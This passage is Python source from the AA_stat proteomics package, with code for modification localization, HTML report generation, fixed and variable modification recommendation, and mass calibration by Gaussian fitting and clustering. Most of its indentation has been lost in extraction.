df['localization_count'], df['top isoform'], df['top_terms'], df['localization score'], df['loc_position'] = None, None, None, None, None
else:
z = list(zip(*df.apply(lambda x: localization_of_modification(
ms, ms_label, x, locations_ms, params_dict, spectra_dict, mass_shift_dict), axis=1)))
utils.internal('z: %s', z)
names = ['localization_count', 'top isoform', 'top_terms', 'localization score', 'loc_position']
dt = {'localization score': np.float32}
for c, v in zip(names, z):
t = dt.get(c, np.object_)
# utils.internal('Saving %s as %s...', c, t)
shape = (len(v), )
value = np.empty(shape, t)
value[:] = v
# utils.internal('Value: %s', value)
df[c] = value
fname = io.table_path(params_dict['output directory'], ms_label)
peptide = params_dict['peptides_column']
mod_aa = string.ascii_lowercase
mod_dicts = {}
for pair in locations_ms:
labels_mod = {}
i = 0
for m in pair:
labels_mod[mod_aa[i]] = m
i += 1
mod_dicts[tuple(sorted(pair))] = labels_mod
columns = ['top isoform', 'localization score', params_dict['spectrum_column']]
df['top isoform'] = df['top isoform'].fillna(df[peptide])
df.loc[df.top_terms.notna(), 'mod_dict'] = df.loc[df.top_terms.notna(), 'top_terms'].apply(lambda t: mod_dicts[tuple(sorted(t))])
df['top isoform'] = df.apply(utils.format_isoform, axis=1, args=(params_dict,))
df[columns].to_csv(fname, index=False, sep='\t')
result = df['localization_count'].sum() or Counter()
logger.debug('Localization result for %s: %s', ms_label, result)
    return {ms_label: result}

# ===== end of file: AA_stat/localization.py (package: AA-stat) =====
import jinja2
import logging
import os
import sys
import re
import warnings
import json
import pkg_resources
from datetime import datetime
import math
import operator
import pandas as pd
import lxml.html
from pyteomics import mass
from . import utils, stats
logger = logging.getLogger(__name__)
def format_unimod_repr(record):
return '<a href="http://www.unimod.org/modifications_view.php?editid1={0[record_id]}">{0[title]}</a>'.format(record)
def matches(row, ms, sites, params_dict):
ldict = row['localization_count']
if 'non-localized' in ldict:
return False
for loc in ldict:
site, shift = utils.parse_l10n_site(loc)
if shift != ms:
continue
for possible_site, possible_position in sites:
if site == possible_site:
if possible_position[:3] == 'Any': # Anywhere, Any C-term, Any N-term
return True
if possible_position == 'Protein N-term' and row[params_dict['prev_aa_column']] == '-':
return True
if possible_position == 'Protein C-term' and row[params_dict['next_aa_column']] == '-':
return True
return False
def format_unimod_info(row, df, params_dict):
out = []
for record_id in row['unimod accessions']:
record = utils.UNIMOD[record_id]
name = format_unimod_repr(record)
if 'top isoform' in df:
sites = {(group['site'], group['position']) for group in record['specificity']}
matching = df.apply(matches, args=(row.name, sites, params_dict), axis=1).sum()
total = row['# peptides in bin']
out.append({'label': '{} ({:.0%} match)'.format(name, matching / total),
'priority': 1 - matching / total, 'type': 'unimod', 'ref': []})
else:
out.append({'label': name, 'priority': 1, 'type': 'unimod', 'ref': []})
return out
def get_label(table, ms, second=False):
row = table.loc[ms]
if len(row['raw info']) == 1:
if len(row['unimod accessions']) == 1:
record = utils.UNIMOD[next(iter(row['unimod accessions']))]
return ('+ ' if second else '') + format_unimod_repr(record)
return ms
def get_artefact_interpretations(row, mass_shift_data_dict, locmod_df, params_dict):
out = []
aa_mass = mass.std_aa_mass.copy()
aa_mass.update(params_dict['fix_mod'])
enz = params_dict.get('enzyme')
df = mass_shift_data_dict[row.name][1]
peps = df[params_dict['peptides_column']]
match_aa = set()
for aa, m in aa_mass.items():
if abs(abs(row['mass shift']) - m) < params_dict['frag_acc']:
match_aa.add(aa)
if not match_aa:
return []
if enz:
cut = set(enz['cut']) & match_aa
nocut = set(enz.get('nocut', []))
else:
cut, nocut = None, set()
explained = False
if row['mass shift'] < 0:
# this can be a loss of any terminal amino acid, or ...
# an artefact of open search, where the peptide is actually unmodified.
# in the latter case the amino acid should be an enzyme cleavage site
if cut:
# possible artefact
if enz['sense'] == 'C':
pct = (
(peps.str[0].isin(cut) & ~peps.str[1].isin(nocut)) | # extra amino acid at N-term
peps.str[-2].isin(cut) # extra amino acid at C-term
).sum() / df.shape[0]
elif enz['sense'] == 'N':
pct = (
peps.str[1].isin(cut) |
(peps.str[-1].isin(cut) & ~peps.str[-2].isin(nocut))
).sum() / df.shape[0]
else:
logger.critical('Unknown value of sense in specificity: %s', enz)
sys.exit(1)
logger.debug('%.1f%% of peptides in %s %s with %s.',
pct * 100, row.name, ('start', 'end')[enz['sense'] == 'N'], utils.format_list(cut))
if pct > params_dict['artefact_thresh']:
out.append('Search artefact: unmodified peptides with extra {} at {}-terminus ({:.0%} match)'.format(
utils.format_list(cut), 'CN'[enz['sense'] == 'C'], pct))
explained = True
else:
logger.debug('Not enough peptide support search artefact interpretation.')
if not explained:
if 'top isoform' in df:
lcount = locmod_df.at[row.name, 'localization']
pct = (
lcount.get(utils.format_localization_key('N-term', row.name), 0) +
lcount.get(utils.format_localization_key('C-term', row.name), 0)
) / df.shape[0]
logger.debug('%.1f%% of peptides in %s have terminal localization.', pct * 100, row.name)
if pct > params_dict['artefact_thresh']:
out.append('Loss of ' + utils.format_list(match_aa))
if not enz:
out[-1] += ' or an open search artefact'
else:
# this may be a missed cleavage
if cut:
keys = [params_dict['prev_aa_column'], params_dict['next_aa_column']]
pct = df[keys].apply(
lambda row: bool(cut.intersection(row[keys[0]] + row[keys[1]])), axis=1).sum() / df.shape[0]
logger.debug('%.1f%% of peptides in %s have %s as neighbor amino acid.',
pct * 100, row.name, utils.format_list(cut))
if pct > params_dict['artefact_thresh']:
out.append('Possible miscleavage (extra {} at terminus)'.format(utils.format_list(cut)))
else:
logger.debug('Not enough peptide support search artefact interpretation.')
return out
def collect_info(row, table, mass_shift_data_dict, locmod_df, params_dict):
# Each interpretation is a dict with keys: label, priority, type, ref
options = [{'label': x, 'priority': 0, 'type': 'artefact', 'ref': []} for x in get_artefact_interpretations(
row, mass_shift_data_dict, locmod_df, params_dict)]
options.extend(format_unimod_info(row, mass_shift_data_dict[row.name][1], params_dict))
if row['isotope index']:
options.append({'label': 'isotope of {}', 'ref': [row['isotope index']],
'priority': abs(math.log10(table.at[row['isotope index'], '# peptides in bin'] /
row['# peptides in bin'] / 8)), 'type': 'isotope'})
if isinstance(row['sum of mass shifts'], list):
for terms in row['sum of mass shifts']:
options.append({'label': '{} {}', 'ref': list(terms), 'type': 'sum',
'priority': 1 - min(table.at[terms[0], '# peptides in bin'],
table.at[terms[1], '# peptides in bin']) / table['# peptides in bin'].max()})
logger.debug('Raw options for row %s: %s', row.name, options)
return options
def html_info_item(info):
return '<span class="info_item {0[type]}" data-ref="{0[ref]}">{0[label]}</span>'.format(info)
def format_info(row, table, char_limit):
s = row['raw info']
for d in s:
if d['type'] == 'isotope':
d['label'] = d['label'].format(get_label(table, d['ref'][0]))
if d['type'] == 'sum':
d['label'] = d['label'].format(get_label(table, d['ref'][0]), get_label(table, d['ref'][1], second=True))
out = []
total_len = 0
for info in sorted(s, key=operator.itemgetter('priority')):
out.append(html_info_item(info))
cur_len = len(lxml.html.document_fromstring(info['label']).text_content())
total_len += cur_len
utils.internal('Label %s assigned length %d (total %d)', info['label'], cur_len, total_len)
if total_len > char_limit:
break
else:
return ', '.join(out)
return ', '.join(out[:1]) + '... <span class="expand_info">(<a class="expand_info_link">expand</a>)</span>'
def format_isoform(isoform):
out = re.sub(r'([A-Z]\[[+-]?[0-9]+\])', r'<span class="loc">\1</span>', isoform)
out = re.sub(r'([A-Z]?)\{([+-]?[0-9]+)\}', r'<span class="vmod_loc">\1[\2]</span>', out)
out = re.sub(r'^([A-Z])\.', r'<span class="nterm"><span class="prev_aa">\1</span>.</span>', out)
out = re.sub(r'\.([A-Z])$', r'<span class="cterm">.<span class="next_aa">\1</span></span>', out)
return out
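# Example (illustrative): for 'K.PEPM[+16]TIDE{+42}.R', the regexes wrap the localized
# modification M[+16], the variable-modification shift on E{+42}, and the flanking
# residues K and R in dedicated <span> elements for styling in the HTML report.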
def render_html_report(table_, mass_shift_data_dict, locmod_df, params_dict,
recommended_fmods, recommended_vmods, vmod_combinations, opposite, save_directory, ms_labels, step=None):
peptide = params_dict['peptides_column']
path = os.path.join(save_directory, 'report.html')
if os.path.islink(path):
logger.debug('Deleting link: %s.', path)
os.remove(path)
if table_ is None:
with open(path, 'w') as f:
f.write('No mass shifts found.')
return
table = table_.copy()
labels = params_dict['labels']
table['raw info'] = table.apply(collect_info, axis=1, args=(table, mass_shift_data_dict, locmod_df, params_dict))
table['Possible interpretations'] = table.apply(format_info, args=(table, params_dict['html_truncate']), axis=1)
full_info = json.dumps([', '.join(html_info_item(x)
for x in sorted(y, key=operator.itemgetter('priority'))) for y in table['raw info']])
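    # indices of recommended variable mods whose mass shift has an artefact
    # interpretation (presumably used by the report template to mark them)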
artefact_i = json.dumps([i
for i, (aa, ms) in enumerate(recommended_vmods)
if aa != 'isotope error' and any(x['type'] == 'artefact' for x in table.at[ms, 'raw info'])
])
with pd.option_context('display.max_colwidth', 250):
columns = list(table.columns)
mslabel = '<a id="binh" href="#">mass shift</a>'
columns[0] = mslabel
table.columns = columns
to_hide = list({'is reference', 'sum of mass shifts', 'isotope index', 'unimod accessions',
'is isotope', 'unimod candidates', 'raw info'}.intersection(columns))
table_html = table.style.hide(axis='index').hide(to_hide, axis='columns').applymap(
lambda val: 'background-color: yellow' if val > 1.5 else '', subset=labels
).apply(
lambda row: ['background-color: #cccccc' if row['is reference'] else '' for cell in row], axis=1).set_table_styles([
{'selector': 'tr:hover', 'props': [('background-color', 'lightyellow')]},
{'selector': 'td, th', 'props': [('text-align', 'center')]},
{'selector': 'td, th', 'props': [('border', '1px solid black')]}]
).format({
mslabel: '<a href="#">{}</a>'.format(utils.MASS_FORMAT).format,
'# peptides in bin': '<a href="#">{}</a>'.format}, precision=3
).bar(subset='# peptides in bin', color=stats.cc[2]).to_html(
uuid="aa_stat_table")
peptide_tables = []
for ms in table.index:
df = mass_shift_data_dict[ms][1]
if 'localization score' in df and df['localization score'].notna().any():
df = df.sort_values(['localization score'], ascending=False).loc[:,
['top isoform', 'localization score', params_dict['spectrum_column']]]
df['localization score'] = df['localization score'].astype(float)
else:
dfc = df[[peptide, params_dict['spectrum_column'], params_dict['mods_column']]].copy()
dfc[peptide] = dfc.apply(utils.get_column_with_mods, axis=1, args=(params_dict,))
dfc[peptide] = (
df[params_dict['prev_aa_column']].str[0] + '.' + dfc[peptide] + '.' + df[params_dict['next_aa_column']].str[0])
df = dfc[[peptide, params_dict['spectrum_column']]]
peptide_tables.append(df.to_html(
table_id='peptides_' + ms, classes=('peptide_table',), index=False, escape=False, na_rep='',
formatters={
'top isoform': format_isoform,
peptide: format_isoform,
'localization score': '{:.2f}'.format}))
varmod_table_styles = [{'selector': 'th.col_heading', 'props': [('display', 'none')]},
{'selector': 'th.blank', 'props': [('display', 'none')]},
{'selector': '.data.row0', 'props': [('font-weight', 'bold')]}]
if params_dict['fix_mod']:
d = params_dict['fix_mod'].copy()
d = utils.masses_to_mods(d)
fixmod = pd.DataFrame.from_dict(d, orient='index', columns=['value']).T.style.set_caption(
'Configured, fixed').format(utils.MASS_FORMAT).to_html(uuid="set_fix_mod_table")
else:
fixmod = "Set modifications: none."
if params_dict['var_mod']:
varmod = pd.DataFrame.from_records(params_dict['var_mod'], columns=['', 'value']).T.style.set_caption(
'Configured, variable').format(
lambda x: utils.mass_format(x) if isinstance(x, float) else x).set_table_styles(
varmod_table_styles).to_html(uuid="set_var_mod_table")
else:
varmod = None
if recommended_fmods:
recmod = pd.DataFrame.from_dict(recommended_fmods, orient='index', columns=['value']).T.style.set_caption(
'Recommended, fixed').to_html(uuid="rec_fix_mod_table")
else:
recmod = "No fixed modifications recommended."
if recommended_vmods:
vmod_comb_i = json.dumps(list(vmod_combinations))
vmod_comb_val = json.dumps(['This modification is a combination of {} and {}.'.format(*v) for v in vmod_combinations.values()])
opp_mod_i = json.dumps(opposite)
        opp_mod_v = json.dumps(['This modification negates a fixed modification.\n'
                                'For closed search, it is equivalent to setting {} @ {} as variable.'.format(
                                    utils.mass_format(-ms_labels[recommended_vmods[i][1]]), recommended_vmods[i][0]) for i in opposite])
rec_var_mods = pd.DataFrame.from_records(recommended_vmods, columns=['', 'value']).T.style.set_caption(
'Recommended, variable').format({'isotope error': '{:.0f}'}).set_table_styles(varmod_table_styles).to_html(uuid="rec_var_mod_table")
else:
rec_var_mods = "No variable modifications recommended."
vmod_comb_i = vmod_comb_val = opp_mod_i = opp_mod_v = '[]'
reference = table.loc[table['is reference']].index[0]
if step is None:
steps = ''
else:
if step != 1:
prev_url = os.path.join(os.path.pardir, 'os_step_{}'.format(step - 1), 'report.html')
prev_a = r'<a class="prev steplink" href="{}">Previous step</a>'.format(prev_url)
else:
prev_a = ''
if recommended_fmods:
next_url = os.path.join(os.path.pardir, 'os_step_{}'.format(step + 1), 'report.html')
next_a = r'<a class="next steplink" href="{}">Next step</a>'.format(next_url)
else:
next_a = ''
steps = prev_a + '\n' + next_a
version = pkg_resources.get_distribution('AA_stat').version
write_html(path, table_html=table_html, peptide_tables=peptide_tables, fixmod=fixmod, varmod=varmod,
reference=reference, recmod=recmod, rec_var_mod=rec_var_mods, steps=steps, version=version, date=datetime.now(),
vmod_comb_i=vmod_comb_i, vmod_comb_val=vmod_comb_val, opposite_i=opp_mod_i, opposite_v=opp_mod_v,
full_info=full_info, artefact_i=artefact_i)
def write_html(path, **template_vars):
with warnings.catch_warnings():
if not sys.warnoptions:
warnings.simplefilter('ignore')
templateloader = jinja2.PackageLoader('AA_stat', '')
templateenv = jinja2.Environment(loader=templateloader, autoescape=False)
template_file = 'report.template'
template = templateenv.get_template(template_file)
with open(path, 'w') as output:
            output.write(template.render(template_vars))

# ==== end of AA_stat/html.py ====
import logging
from collections import defaultdict
import re
from . import utils
logger = logging.getLogger(__name__)
def get_fix_mod_from_l10n(mslabel, locmod_df):
    l10n = locmod_df.at[mslabel, 'localization']
    logger.debug('Localizations for %s: %s', mslabel, l10n)
    if l10n:
        l10n.pop('non-localized', None)
        if l10n:  # the counter may contain nothing but 'non-localized' counts
            top_loc = max(l10n, key=l10n.get)
            logger.debug('Top localization label for %s: %s', mslabel, top_loc)
            return top_loc
def get_fixed_mod_raw(aa, data_dict, params_dict, choices=None):
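    # for residue `aa`, pick the mass shift whose peptides contain `aa` most often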
dist_aa = []
for ms, v in data_dict.items():
if choices is None or ms in choices:
dist_aa.append([v[0], v[1][params_dict['peptides_column']].apply(lambda x: x.count(aa)).sum()])
utils.internal('Counts for %s: %s', aa, dist_aa)
top_shift = max(dist_aa, key=lambda tup: tup[1])
return utils.mass_format(top_shift[0])
def determine_fixed_mods_nonzero(reference, locmod_df, data_dict):
"""Determine fixed modifications in case the reference shift is not at zero.
Needs localization.
"""
utils.internal('Localizations for %s: %s', reference, locmod_df.at[reference, 'localization'])
loc = get_fix_mod_from_l10n(reference, locmod_df)
label = reference
data_dict = data_dict.copy()
    while loc is None:
        del data_dict[label]
        if not data_dict:
            break
        label = max(data_dict, key=lambda k: data_dict[k][1].shape[0])
        loc = get_fix_mod_from_l10n(label, locmod_df)
        logger.debug('No luck. Trying %s. Got %s', label, loc)
    return loc
def determine_fixed_mods_zero(aastat_result, data_dict, params_dict):
"""Determine fixed modifications in case the reference shift is at zero.
Does not need localization.
"""
fix_mod_zero_thresh = params_dict['fix_mod_zero_thresh']
min_fix_mod_pep_count_factor = params_dict['min_fix_mod_pep_count_factor']
fix_mod_dict = {}
reference = utils.mass_format(0)
aa_rel = aastat_result[reference][2]
utils.internal('aa_rel:\n%s', aa_rel)
candidates = aa_rel[aa_rel < fix_mod_zero_thresh].index
logger.debug('Fixed mod candidates: %s', candidates)
for i in candidates:
candidate_label = get_fixed_mod_raw(i, data_dict, params_dict)
if candidate_label != reference:
            # the number of peptides with `i` at the candidate shift must exceed
            # the number at the reference shift by `min_fix_mod_pep_count_factor`
            count_cand = data_dict[candidate_label][1][params_dict['peptides_column']].str.contains(i).sum()
            count_ref = data_dict[reference][1][params_dict['peptides_column']].str.contains(i).sum()
            # fraction of peptides with `i` at the candidate shift, relative to the
            # total number of peptides at the reference shift
            est_ratio = count_cand / len(data_dict[reference][1])
            logger.debug('Peptides with %s: ~%d at %s, ~%d at %s. Estimated fraction: %f',
                         i, count_ref, reference, count_cand, candidate_label, est_ratio)
if aastat_result[candidate_label][2][i] > fix_mod_zero_thresh and (
est_ratio * 100 > fix_mod_zero_thresh * min_fix_mod_pep_count_factor):
fix_mod_dict[i] = candidate_label
else:
logger.debug('Could not find %s anywhere. Can\'t fix.', i)
else:
logger.debug('Reference shift is the best for %s.', i)
return fix_mod_dict
def determine_fixed_mods(aastat_result, aastat_df, locmod_df, data_dict, params_dict):
reference = aastat_df.loc[aastat_df['is reference']].index[0]
if reference == utils.mass_format(0):
logger.info('Reference bin is at zero shift.')
fix_mod_dict = determine_fixed_mods_zero(aastat_result, data_dict, params_dict)
else:
if locmod_df is None:
logger.warning('No localization data. '
'Cannot determine fixed modifications when reference mass shift is non-zero.')
return {}
logger.info('Reference bin is at %s. Looking for fixed modification to compensate.', reference)
loc = determine_fixed_mods_nonzero(reference, locmod_df, data_dict)
if loc:
aa, shift = utils.parse_l10n_site(loc)
fix_mod_dict = {aa: shift}
else:
logger.info('No localizations. Stopping.')
return fix_mod_dict
def recommend_isotope_error(aastat_df, locmod_df, params_dict):
reference = aastat_df.loc[aastat_df['is reference']].index[0]
ref_peptides = locmod_df.at[reference, '# peptides in bin']
logger.debug('%d peptides at reference %s', ref_peptides, reference)
ref_isotopes = []
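    # follow the chain of isotope shifts upward from the reference;
    # the loop appends a trailing None, which is removed by pop()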
label = reference
while label:
label = utils.get_isotope_shift(label, locmod_df)
ref_isotopes.append(label)
ref_isotopes.pop()
i = 0
for i, label in enumerate(ref_isotopes, 1):
peps = locmod_df.at[label, '# peptides in bin']
logger.debug('%d peptides at %s.', peps, label)
if peps * 100 / ref_peptides < params_dict['recommend isotope threshold']:
return i - 1
return i
def recalculate_counts(aa, ms, mods_and_counts, data_dict):
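    # drop all counts for `aa` at `ms`; for each PSM where the shift was localized,
    # also decrement the complementary terminal/residue count at `ms`,
    # so that the same localization is not counted twice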
mods_and_counts[aa].pop(ms, None)
for i, row in data_dict[ms][1].iterrows():
seq = row['top isoform'].split('.')[1]
if row['top_terms'] is not None and ms in row['top_terms']:
if aa == 'N-term' and seq[1] == '[':
utils.internal('Reducing count of %s for %s (%s)', seq[0], seq, aa)
if mods_and_counts[seq[0]].get(ms, 0) > 0:
mods_and_counts[seq[0]][ms] -= 1
elif aa == 'C-term' and seq[-1] == ']':
res = seq.split('[')[0][-1]
utils.internal('Reducing count of %s for %s (%s)', res, seq, aa)
if mods_and_counts[res].get(ms, 0) > 0:
mods_and_counts[res][ms] -= 1
elif seq[:2] == aa + '[':
utils.internal('Reducing count of N-term for %s', seq)
if mods_and_counts['N-term'].get(ms, 0) > 0:
mods_and_counts['N-term'][ms] -= 1
elif seq[-1] == ']' and seq.split('[')[0][-1] == aa:
utils.internal('Reducing count of C-term for %s', seq)
if mods_and_counts['C-term'].get(ms, 0) > 0:
mods_and_counts['C-term'][ms] -= 1
def recalculate_with_isotopes(aa, ms, isotope_rec, mods_and_counts, data_dict, locmod_df):
    logger.debug('Recalculating counts for %s @ %s', aa, ms)
    recalculate_counts(aa, ms, mods_and_counts, data_dict)
    label = ms
    i = 0
    while i < isotope_rec:
        # walk up the isotope chain, one shift per iteration
        label = utils.get_isotope_shift(label, locmod_df)
        if label:
            logger.debug('Recalculating %s counts for isotope shift %s', aa, label)
            recalculate_counts(aa, label, mods_and_counts, data_dict)
            i += 1
        else:
            break
def same_residue(isoform):
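    # True when a localized mod and a configured variable mod fall on the same residue,
    # e.g. 'X[+16]{+80}' inside the isoform, or a terminal '{...}X[...' pattern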
return ']{' in isoform or re.search(r'\.{[0-9+-]*?}[A-Z]\[', isoform)
def recalculate_varmods(data_dict, mods_and_counts, params_dict):
# cancel out already configured modifications
for site, mod in params_dict['var_mod']:
ms = utils.find_mass_shift(mod, data_dict, params_dict['prec_acc'])
if ms:
if mods_and_counts[site].get(ms, 0) > 0:
logger.debug('Setting all counts for %s @ %s to zero.', ms, site)
mods_and_counts[site][ms] = 0
for ms in data_dict:
shift, df = data_dict[ms]
for i, row in df.iterrows():
if row['top_terms'] is not None and ms in row['top_terms']:
peptide = row[params_dict['peptides_column']]
if same_residue(row['top isoform']): # localization and enabled variable modification on the same residue
# this should count towards sum of these shifts, not the localized one
pos = row['loc_position'][0]
mods = utils.get_var_mods(row, params_dict)
utils.internal('%s: extracting %d from %s', row['top isoform'], pos, mods)
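                    # variable mods are keyed by residue position; terminal mods appear
                    # under key 0 (N-term) and len(peptide) + 1 (C-term)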
if pos in mods:
vm = mods[pos]
elif pos == 1:
vm = mods[0]
elif pos == len(peptide):
vm = mods[pos + 1]
else:
                        raise KeyError('Could not find variable modification for position {} in {}'.format(pos, mods))
aa = peptide[pos - 1]
if mods_and_counts[aa].get(ms, 0) > 0:
utils.internal('Reducing count of %s at %s', aa, ms)
mods_and_counts[aa][ms] -= 1
if pos == 1 and mods_and_counts['N-term'].get(ms, 0) > 0:
mods_and_counts['N-term'][ms] -= 1
utils.internal('Reducing count of N-term at %s', ms)
if pos == len(peptide) and mods_and_counts['C-term'].get(ms, 0) > 0:
utils.internal('Reducing count of C-term at %s', ms)
mods_and_counts['C-term'][ms] -= 1
sum_ms = utils.find_mass_shift(vm + shift, data_dict, params_dict['prec_acc'])
if sum_ms:
mods_and_counts[aa][sum_ms] = mods_and_counts[aa].get(sum_ms, 0) + 1
utils.internal('Increasing count of %s at %s', aa, sum_ms)
if pos == 1:
utils.internal('Increasing count of N-term at %s', sum_ms)
mods_and_counts['N-term'][sum_ms] = mods_and_counts['N-term'].get(sum_ms, 0) + 1
if pos == len(peptide):
utils.internal('Increasing count of C-term at %s', sum_ms)
mods_and_counts['C-term'][sum_ms] = mods_and_counts['C-term'].get(sum_ms, 0) + 1
def determine_var_mods(aastat_result, aastat_df, locmod_df, data_dict, params_dict, recommended_fix_mods=None):
if locmod_df is None:
logger.info('Cannot recommend variable modifications without localization.')
return {}
var_mods = []
recommended = set()
multiple = params_dict['multiple_mods']
if multiple:
logger.info('Recommending multiple modifications on same residue.')
else:
logger.info('Recommending one modification per residue.')
isotope_rec = recommend_isotope_error(aastat_df, locmod_df, params_dict)
logger.info('Recommended isotope mass error: %d.', isotope_rec)
if isotope_rec:
var_mods.append(('isotope error', isotope_rec))
reference = aastat_df.loc[aastat_df['is reference']].index[0]
mods_and_counts = defaultdict(dict) # dict of AA: shift label: count
for shift in data_dict:
if shift == reference:
continue
l10n = locmod_df.at[shift, 'localization']
for k, count in l10n.items():
if k == 'non-localized':
continue
aa, locshift = utils.parse_l10n_site(k)
if locshift == shift:
mods_and_counts[aa][shift] = count
logger.debug('Without isotopes, localization counts are:')
for k, d in mods_and_counts.items():
logger.debug('%s: %s', k, d)
if isotope_rec:
for aa, dcounts in mods_and_counts.items():
for shift, count in list(dcounts.items()):
                label = shift
                i = 0
                while i < isotope_rec:
                    # walk up the isotope chain, adding counts of successive isotopes
                    label = utils.get_isotope_shift(label, locmod_df)
                    if label:
                        dcounts[shift] = dcounts.get(shift, 0) + mods_and_counts[aa].get(label, 0)
                        # dcounts.pop(label, None)
                        i += 1
                    else:
                        break
    # zero out counts at the isotope shifts of the reference bin
    i = 0
    label = reference
    while i < isotope_rec:
        label = utils.get_isotope_shift(label, locmod_df)
        if label:
            logger.debug('Removing all counts for isotope shift %s', label)
            for aa, dcounts in mods_and_counts.items():
                dcounts[label] = 0
            i += 1
        else:
            break
logger.debug('With isotopes, localization counts are:')
for k, d in mods_and_counts.items():
logger.debug('%s: %s', k, d)
if recommended_fix_mods:
logger.debug('Subtracting counts for fixed mods.')
for aa, shift in recommended_fix_mods.items():
recalculate_with_isotopes(aa, shift, isotope_rec, mods_and_counts, data_dict, locmod_df)
if params_dict['var_mod']:
if not multiple:
            logger.info('Multiple variable modifications are disabled, not recommending %s for variable modifications.',
                        utils.format_list(set(x[0] for x in params_dict['var_mod'])))
for aa, shift in params_dict['var_mod']:
logger.debug('Removing all counts for %s.', aa)
for sh in mods_and_counts[aa]:
mods_and_counts[aa][sh] = 0
logger.debug('Subtracting counts for variable mods.')
recalculate_varmods(data_dict, mods_and_counts, params_dict)
for i in range(params_dict['variable_mods']):
logger.debug('Choosing variable modification %d. Counts are:', i + 1)
for k, d in mods_and_counts.items():
logger.debug('%s: %s', k, d)
aa_shifts = {aa: max(dcounts, key=dcounts.get) for aa, dcounts in mods_and_counts.items() if dcounts}
if mods_and_counts:
aa_counts = {aa: mods_and_counts[aa][shift] for aa, shift in aa_shifts.items()}
logger.debug('Best localization counts: %s', aa_shifts)
logger.debug('Values: %s', aa_counts)
if aa_shifts:
top_aa = max(aa_shifts, key=aa_counts.get)
top_shift = aa_shifts[top_aa]
top_count = aa_counts[top_aa]
if top_count < params_dict['min_loc_count']:
logger.debug('Localization count too small (%d), stopping.', top_count)
break
recommended.add(top_aa)
var_mods.append((top_aa, top_shift))
logger.debug('Chose %s @ %s.', top_shift, top_aa)
recalculate_with_isotopes(top_aa, top_shift, isotope_rec, mods_and_counts, data_dict, locmod_df)
if not multiple:
logger.debug('Removing all counts for %s.', top_aa)
for sh in mods_and_counts[top_aa]:
mods_and_counts[top_aa][sh] = 0
    return var_mods

# ==== end of AA_stat/recommendations.py ====
import matplotlib
matplotlib.use('Agg')
import pylab as plt
import math
import os
import logging
import warnings
import multiprocessing as mp
import numpy as np
from sklearn import cluster
from scipy.optimize import curve_fit
from scipy.signal import argrelextrema, savgol_filter
import seaborn as sb
from . import utils
logger = logging.getLogger(__name__)
logging.getLogger('matplotlib.font_manager').disabled = True
logging.getLogger('matplotlib.category').disabled = True
cc = ["#FF6600",
"#FFCC00",
"#88AA00",
"#006688",
"#5FBCD3",
"#7137C8",
]
sb.set_style('white')
colors = sb.color_palette(palette=cc)
def _gauss_fit_slice(to_fit, unit, filename, title, params_dict, mpl_back):
logger.debug('Fitting zero-shift peptides...')
f = plt.figure()
hist_0 = np.histogram(to_fit, bins=int(params_dict['zero_window'] / params_dict['bin_width']))
hist_y = hist_0[0]
hist_x = 0.5 * (hist_0[1][:-1] + hist_0[1][1:])
plt.plot(hist_x, hist_y, 'b+')
popt, perr = gauss_fitting(max(hist_y), hist_x, hist_y)
plt.scatter(hist_x, gauss(hist_x, *popt), label='Gaussian fit')
plt.xlabel('massdiff, ' + unit)
plt.title(title)
mpl_back.savefig(f)
plt.close()
logger.info('Systematic shift is %.4f %s for file %s [ %s ]', popt[1], unit, filename, title)
return popt
def clusters(df, to_fit, unit, filename, params_dict, mpl_back):
if to_fit.shape[0] < 500:
logger.warning('Not enough data for cluster analysis. Need at least 500 peptides near zero, found %d.', to_fit.shape[0])
return None
X = np.empty((to_fit.shape[0], 2))
X[:, 0] = to_fit
X[:, 1] = df.loc[to_fit.index, params_dict['rt_column']]
logger.debug('Clustering a %s array.', X.shape)
logger.debug('Initial dimensions: %s to %s', X.min(axis=0), X.max(axis=0))
logger.debug('Converting to square...')
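    # rescale the mass-error axis to span the same range as RT, so that a single
    # DBSCAN eps radius is meaningful in both dimensions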
span_0 = X[:, 0].max() - X[:, 0].min()
span_1 = X[:, 1].max() - X[:, 1].min()
ratio = span_1 / span_0
X[:, 0] *= ratio
logger.debug('Transformed dimensions: %s to %s', X.min(axis=0), X.max(axis=0))
eps = span_1 * params_dict['zero_window'] * params_dict['eps_adjust']
logger.debug('Using eps=%f', eps)
clustering = cluster.DBSCAN(eps=eps, min_samples=params_dict['min_samples']).fit(X)
f = plt.figure()
sc = plt.scatter(to_fit, X[:, 1], c=clustering.labels_)
plt.legend(*sc.legend_elements(), title='Clusters')
plt.xlabel(unit)
plt.ylabel(params_dict['rt_column'])
mpl_back.savefig(f)
plt.close()
f = plt.figure()
for c in np.unique(clustering.labels_):
plt.hist(X[clustering.labels_ == c, 1], label=c, alpha=0.5)
plt.xlabel(params_dict['rt_column'])
plt.legend()
mpl_back.savefig(f)
plt.close()
return clustering
def cluster_time_span(clustering, label, df, to_fit, params_dict):
times = df.loc[to_fit.index].loc[clustering.labels_ == label, params_dict['rt_column']]
return times.min(), times.max()
def span_percentage(span, df, to_fit, params_dict):
start, end = span
all_rt = df[params_dict['rt_column']]
return (end - start) / (all_rt.max() - all_rt.min())
def cluster_time_percentage(clustering, label, df, to_fit, params_dict):
span = cluster_time_span(clustering, label, df, to_fit, params_dict)
return span_percentage(span, df, to_fit, params_dict)
def filter_clusters(clustering, df, to_fit, params_dict):
nclusters = clustering.labels_.max() + 1
logger.debug('Found %d clusters, %d labels assigned.', nclusters, clustering.labels_.size)
if not nclusters:
return []
out = []
clustered_peps = 0
for i in np.unique(clustering.labels_):
if i == -1:
continue
npep = (clustering.labels_ == i).sum()
if npep < params_dict['min_peptides_for_mass_calibration']:
logger.debug('Cluster %s is too small for calibration (%d), discarding.', i, npep)
continue
span_pct = cluster_time_percentage(clustering, i, df, to_fit, params_dict)
if span_pct < params_dict['cluster_span_min']:
logger.debug('Cluster %s spans %.2f%% of the run (too small, thresh = %.2f%%). Discarding.',
i, span_pct * 100, params_dict['cluster_span_min'] * 100)
continue
out.append(i)
clustered_peps += npep
logger.debug('Pre-selected clusters: %s', out)
logger.debug('%.2f%% peptides in clusters, threshold is %.2f%%.',
clustered_peps / df.shape[0] * 100, params_dict['clustered_pct_min'] * 100)
if clustered_peps / df.shape[0] < params_dict['clustered_pct_min']:
logger.debug('Too few peptides in clusters, discarding clusters altogether.')
return []
return out
def get_fittable_series(df, params_dict, mask=None):
window = params_dict['zero_window']
shifts = params_dict['mass_shifts_column']
loc = df[shifts].abs() < window
# logger.debug('loc size for zero shift: %s', loc.size)
if params_dict['calibration'] == 'gauss':
to_fit = df.loc[loc, shifts]
unit = 'Da'
elif params_dict['calibration'] == 'gauss_relative':
